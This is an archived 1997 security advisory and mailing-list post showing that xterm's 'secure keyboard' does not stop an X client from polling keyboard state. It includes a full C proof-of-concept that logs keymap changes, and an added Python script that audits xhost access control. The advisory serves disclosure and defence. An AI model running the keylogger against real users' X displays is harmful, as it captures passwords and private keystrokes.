xsecurekeyboard problem

Description: Many people think that by clicking "secure keyboard" on their xterm, they are safe from snoopers. This is not always true, as Christopher Creutzig demonstrates by connecting to the X server and reading the keyboard state 100 times per second.
Author: Christopher Creutzig <christopher@nescio.foebud.org>
Compromise: read someone's keystrokes if you can connect to their X server, even if they are using the "secure keyboard" feature
Vulnerable Systems: XFree86, probably other implementations
Date: 6 October 1997

Date: Mon, 6 Oct 1997 21:55:27 +0100 (MET)
From: Christopher Creutzig <christopher@nescio.foebud.org>
To: linux-security@redhat.com
Subject: [linux-security] xterm "secure console" insecure


Dear Rogier,

 some time ago I laid claim that xterm's "secure console" feature was by no
means secure. You asked me to demonstrate this to you before you were to
forward my message to linux-security. Please find enclosed the program I use
as proof-of-concept.

Dear readers,

 please find enclosed a program illustrating a problem with xterm "secure
keyboard" and other programs claiming some method of allowing you to type in
passwords etc. securely even though untrusted applications have access to
your X server. Personally, I had heard about this problem some time ago, but
a message of mine stating this problem in a different discussion had not
been approved to linux-security because "quite a number of people good at
security think it's sufficient to use 'secure keyboard'", so I wrote a small
demonstration program. (It's actually my first X program, so don't be
surprised if it looks very inexperienced.)

 What the program does is, it connects to the X display specified in the
environment variable DISPLAY and reads the keyboard status 100 times per
second. Every time the keyboard status changes, it dumps the data returned
by XQueryKeymap to its output. It does not try to figure out the actual keys
depressed, but then it's only supposed to be proof-of-concept. It works for
me on RedHat 4.0, but as far as I know, nothing has been changed with regard
to this problem in more recent versions of XFree86. I have not verified the
presence of this problem on other machines yet.

/* Read everything typed on an X terminal you're allowed to connect to.
   Copyright (C) 1997 Christopher Creutzig */

#include <X11/Xlib.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

int main(int argc, char **argv) {
	Display *disp;
	int i, changed;
	char *s;
	struct timeval shorttime;
	char keys[32];		/* keymap as returned by XQueryKeymap: 1 bit per keycode */
	char lastkeys[32];	/* previous keymap, to detect changes */

	/* select() with no descriptors is used purely as a short sleep
	   (10 microseconds here; the text above speaks of 100 polls per second) */
	shorttime.tv_sec = 0;
	shorttime.tv_usec = 10;
	s = getenv("DISPLAY");
	disp = XOpenDisplay(s);
	if (NULL==disp) {
		fprintf(stderr, "%s: can't open display %s\n", argv[0],
			s ? s : "(DISPLAY not set)");
		exit(1);
	}
	for(i=0; i<32; i++) {
		keys[i] = 0;
		lastkeys[i] = 1;
	}
	while(1) {
		select(0, NULL, NULL, NULL, &shorttime);
		XQueryKeymap(disp, keys);	/* works regardless of any keyboard grab */
		changed = 0;
		for(i=0; i<32; i++) {
			if (keys[i] != lastkeys[i])
				changed = 1;
			lastkeys[i] = keys[i];
		}
		if (changed) {
			printf("Keyboard status:\n ");
			for (i=0; i<32; i++)
				printf("%02x ", (unsigned char)keys[i]);
			printf("\n");
		}
	}
	return 0;
}
 (Yes I know it never reaches XCloseDisplay, I just think it looks cleaner
this way... :-))

Christopher Creutzig # Im Samtfelde 19 # D-33098 Paderborn # V+49-5251-71873
  # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
   For important matters: at the moment I read mail sent to 'ccr@mupad.de' much more often.

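The fix the advisory implies is not a better "secure keyboard" but keeping untrusted clients off the display in the first place, since any connected client can poll XQueryKeymap. As an added example (not part of the original post or of this exploit index), the following Python helper parses the output of `xhost` and reports whether the display is open to any client, open to named hosts, or restricted to local users and xauth cookies. The sample `xhost` outputs are constructed, and the prefix lists assume xhost's usual `INET:` / `SI:localuser:` entry formats.

```python
#!/usr/bin/env python3
"""Audit X server access control from `xhost` output.

Added example, not from the original post.  Any client allowed to connect
to the display can poll the keymap, so the useful check is whether the
display admits clients it should not.  The classification below can run
from a login script or a fleet audit.
"""
import os
import subprocess

# Entry prefixes xhost prints for host-based (network) permissions and
# for local-user/local-group permissions.  Assumed from xhost's usual
# output format; extend if your server reports other families.
NETWORK_PREFIXES = ("INET:", "INET6:", "DNET:", "NIS:")
LOCAL_PREFIXES = ("SI:localuser:", "SI:localgroup:", "LOCAL:")


def parse_xhost(output):
    """Return (access_control_enabled, entries) from xhost's text output."""
    lines = [ln.strip() for ln in output.splitlines() if ln.strip()]
    if not lines:
        raise ValueError("empty xhost output")
    header = lines[0].lower()
    if header.startswith("access control enabled"):
        enabled = True
    elif header.startswith("access control disabled"):
        enabled = False
    else:
        raise ValueError("unrecognised xhost header: %r" % lines[0])
    return enabled, lines[1:]


def assess(output):
    """Classify display exposure.  Returns a dict with access_control,
    network_entries, local_entries, other_entries, risk and reason."""
    enabled, entries = parse_xhost(output)
    network = [e for e in entries if e.startswith(NETWORK_PREFIXES)]
    local = [e for e in entries if e.startswith(LOCAL_PREFIXES)]
    other = [e for e in entries if e not in network and e not in local]
    if not enabled:
        risk = "high"
        reason = ("access control disabled: any client that can reach the "
                  "display may connect and poll the keyboard state")
    elif network or other:
        risk = "medium"
        reason = ("%d host/unknown entries: every user on those hosts can "
                  "connect without an xauth cookie" % (len(network) + len(other)))
    else:
        risk = "low"
        reason = ("only local users/groups are listed; other clients need "
                  "a valid xauth cookie")
    return {"access_control": enabled, "network_entries": network,
            "local_entries": local, "other_entries": other,
            "risk": risk, "reason": reason}


def audit_display(display=None):
    """Run the real xhost against DISPLAY (or the given display) and assess it.
    Must run as the user who owns the display, or xhost cannot connect."""
    env = dict(os.environ)
    if display is not None:
        env["DISPLAY"] = display
    out = subprocess.run(["xhost"], env=env, capture_output=True,
                         text=True, check=True).stdout
    return assess(out)


# Constructed sample outputs (not captured from a real host).
SAMPLE_OPEN = "access control disabled, clients can connect from any host\n"
SAMPLE_HOSTS = ("access control enabled, only authorized clients can connect\n"
                "INET:workstation42.example.test\n"
                "SI:localuser:alice\n")
SAMPLE_LOCAL = ("access control enabled, only authorized clients can connect\n"
                "SI:localuser:alice\n")

if __name__ == "__main__":
    for label, sample in (("open", SAMPLE_OPEN), ("hosts", SAMPLE_HOSTS),
                          ("local", SAMPLE_LOCAL)):
        r = assess(sample)
        print("%-5s risk=%-6s %s" % (label, r["risk"], r["reason"]))
```

A "low" result here only means xhost is not widening access: clients that present the display's MIT-MAGIC-COOKIE-1 cookie (or arrive through ssh X forwarding) are still full peers on the display, so the cookie file's permissions and which hosts you forward from matter just as much as the xhost list.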
